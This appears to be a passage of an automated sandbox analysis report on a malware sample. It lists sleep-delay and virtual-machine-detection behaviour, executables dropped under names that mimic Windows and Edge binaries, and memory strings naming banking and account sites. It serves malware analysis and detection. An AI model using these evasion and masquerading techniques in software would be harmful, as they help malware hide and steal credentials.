                                Source: C:\ProgramData\fontdrvhost.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\fontdrvhost.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\fontdrvhost.exeThread delayed: delay time: 922337203685477
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\fontdrvhost.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\fontdrvhost.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exe Window / User API: threadDelayed 3799
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exe Window / User API: threadDelayed 5726
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Window / User API: threadDelayed 4241
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Window / User API: threadDelayed 5456
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5095
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5004
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5798
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5635
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5740
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exe TID: 7648 Thread sleep time: -26747778906878833s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe TID: 7880 Thread sleep time: -30000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe TID: 7788 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -37815825351104557s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -600000s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -599889s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -599780s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -599671s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -599562s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -599453s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -599341s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -599232s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -598884s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -598769s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -598640s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 3568Thread sleep time: -30000s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -598505s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -598312s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -597218s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 7120Thread sleep time: -3600000s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -596343s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -594093s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -593484s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -593093s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -592859s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -590812s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -590562s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 7120Thread sleep time: -300000s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -590343s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -590130s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -588968s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -588363s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -588156s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -587937s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -587609s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -587452s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -587183s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -585670s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -585560s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -585405s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -585276s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -585130s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -584937s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -584828s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -584715s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -584593s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -584484s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -584310s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -583603s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -583462s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -583352s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -583234s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -583124s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -583015s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -582903s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -582767s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -582640s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -582530s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -582421s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -582312s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -582202s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -582093s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -581984s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -581874s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -581750s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -581634s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -580867s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -580750s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -580640s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -580531s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -580421s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088Thread sleep count: 5095 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4536Thread sleep time: -8301034833169293s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3832Thread sleep time: -1844674407370954s >= -30000s
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 7812Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1012Thread sleep count: 5004 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4788Thread sleep time: -9223372036854770s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4128Thread sleep count: 5798 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4280Thread sleep time: -10145709240540247s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3648Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3776Thread sleep count: 5635 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4268Thread sleep time: -7378697629483816s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2100Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\ProgramData\fontdrvhost.exe TID: 3904Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4628Thread sleep count: 5740 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4676Thread sleep time: -9223372036854770s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4452Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\ProgramData\fontdrvhost.exe TID: 7808Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\ProgramData\fontdrvhost.exe TID: 8112Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 6836Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\svchost.exe TID: 608Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 3828Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\ProgramData\fontdrvhost.exe TID: 6392Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 5540Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\ProgramData\fontdrvhost.exe TID: 4668Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 5292Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
                                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
                                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe File Volume queried: C:\ FullSizeInformation
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe File Volume queried: C:\ FullSizeInformation
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe File Volume queried: C:\ FullSizeInformation
                                Source: C:\ProgramData\fontdrvhost.exe File Volume queried: C:\ FullSizeInformation
                                Source: C:\ProgramData\fontdrvhost.exe File Volume queried: C:\ FullSizeInformation
                                Source: C:\ProgramData\fontdrvhost.exe File Volume queried: C:\ FullSizeInformation
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe File Volume queried: C:\ FullSizeInformation
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe File Volume queried: C:\ FullSizeInformation
                                Source: C:\ProgramData\fontdrvhost.exe File Volume queried: C:\ FullSizeInformation
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe File Volume queried: C:\ FullSizeInformation
                                Source: C:\ProgramData\fontdrvhost.exe File Volume queried: C:\ FullSizeInformation
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe File Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 922337203685477
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 600000
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 599889
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 599780
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 599671
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 599562
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 599453
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 599341
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 599232
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 598884
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 598769
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 598640
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 30000
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 598505
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 598312
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 597218
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 3600000
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 596343
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 594093
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 593484
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 593093
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 592859
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 590812
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 590562
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 300000
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 590343
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 590130
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 588968
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 588363
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 588156
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 587937
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 587609
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 587452
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 587183
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 585670
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 585560
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 585405
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 585276
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 585130
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 584937
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 584828
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 584715
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 584593
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 584484
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 584310
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 583603
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 583462
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 583352
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 583234
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 583124
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 583015
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 582903
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 582767
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 582640
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 582530
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 582421
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 582312
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 582202
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 582093
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 581984
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 581874
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 581750
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 581634
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 580867
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 580750
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 580640
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 580531
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 580421
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\fontdrvhost.exeThread delayed: delay time: 922337203685477
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe File opened: C:\Users\user
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe File opened: C:\Users\user\AppData
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe File opened: C:\Users\user\AppData\Local\Temp
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe File opened: C:\Users\user\Desktop\desktop.ini
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe File opened: C:\Users\user\AppData\Local
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe File opened: C:\Users\user\Documents\desktop.ini
                                Source: dD82yUOZl5.27.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                                Source: d3yngi1q.wji.exe, 00000002.00000002.1636177791.0000000001520000.00000004.08000000.00040000.00000000.sdmp, d3yngi1q.wji.exe, 00000002.00000002.1641016699.0000000002F41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hyper-v video
                                Source: dD82yUOZl5.27.drBinary or memory string: discord.comVMware20,11696494690f
                                Source: dD82yUOZl5.27.drBinary or memory string: AMC password management pageVMware20,11696494690
                                Source: dD82yUOZl5.27.drBinary or memory string: outlook.office.comVMware20,11696494690s
                                Source: dD82yUOZl5.27.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                                Source: dD82yUOZl5.27.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                                Source: dD82yUOZl5.27.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hyper-v
                                Source: dD82yUOZl5.27.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                                Source: dD82yUOZl5.27.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                                Source: dD82yUOZl5.27.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                                Source: dD82yUOZl5.27.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                                Source: dD82yUOZl5.27.drBinary or memory string: outlook.office365.comVMware20,11696494690t
